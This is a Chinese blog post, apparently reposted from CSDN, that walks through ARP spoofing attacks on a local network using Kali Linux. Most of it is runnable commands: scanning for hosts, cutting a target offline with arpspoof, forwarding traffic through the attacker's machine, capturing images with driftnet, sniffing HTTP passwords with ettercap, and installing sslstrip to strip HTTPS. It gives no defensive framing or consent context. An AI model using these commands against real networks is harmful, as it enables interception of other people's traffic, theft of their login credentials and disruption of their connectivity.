前言
很久以前的博客才發現,發布一下。
這個系列以后有時間再做。
arp攻擊
arp路由鏈表,感興趣的自行百度,我的博客我的筆記.
路由指向
介紹兩個東西.
1
2
|
echo 0 > / proc / sys / net / ipv4 / ip_forward #讓經過的數據不留通 echo 1 > / proc / sys / net / ipv4 / ip_forward #讓數據流通 |
內網掃描
這個在百度上你可以看到很多相關的方式,比如nmap fping
但是基本上掃描結果不太號,在虛擬機上你會發現你把主機的防火墻關了都掃不到主機.
這里使用netdiscover
當然這里也寫幾個nmap之類的指令
1
2
3
4
|
nmap - pr - sl ip fping - asg ip netdiscover - i kali網卡 - r ip(網段) netdiscover - i eth0 - r 192.168 . 43.1 / 30 |
掃描速度是比較慢的
斷網攻擊
1
2
|
arpspoof - i kali的網卡 - t 目標地址 目標網卡 arpspoof - i eth0 - t 192.168 . 43.7 192.168 . 43.1 |
arp欺騙信息獲取
1.arpspoof -i eth0 -t 192.168.43.7 192.168.43.1
開始欺騙讓數據經過你的電腦
2.echo 1 >/proc/sys/net/ipv4/ip_forward
放掉數據包
獲取圖片
使用工具difinet
difinet -i eth0(網卡)
實際操作:
圖片會在那里臨時保存
由于網絡問題可能會有點卡
獲取http連接的密碼信息
使用ettercap
其他的操作還是一樣的,要開啟arp欺騙
ettercap -tq -i eth0
-t 文本模式 q 安靜模式 i 網卡
然后等待即可.不過現在都是https,作用不大
出現中文怎么辦,直接賦值中文亂碼,之后解碼即可
百度搜索url解碼
或者直接使用python
1
2
3
4
5
6
7
|
中文編碼 from urllib.parse import quote,unquote str1 = '中國' str2 = quote(strl) print (str2) 解碼 print (unquote(str2)) |
獲取https的密碼信息
這個要先修改以下ettercap的配置文件.
vim /etc/ettercap/etter.conf
使用工具 sslstrip
那個吐槽一下 kali 2020是沒有sslstrip的原因是沒有安裝python2的pip 只有pip3
記住一定要先安裝python2
在kali里面python 默認為python2 當然你可以用ln -s 修改一下.
apt install python 這個時候會自動安裝python 2.7
然后輸入以下指令安裝sslstrip
1
2
3
|
git clone https: / / github.com / moxie0 / sslstrip.git cd sslstrip python setup.py install |
這個是python2的,如果沒猜錯可能會遇到openssl報錯說沒有這個模塊
pip install pyopenssl
總結
本篇文章就到這里了,希望能給你帶來幫助,也希望您能夠多多關注服務器之家的更多內容!
原文鏈接:https://blog.csdn.net/FUTEROX/article/details/115185933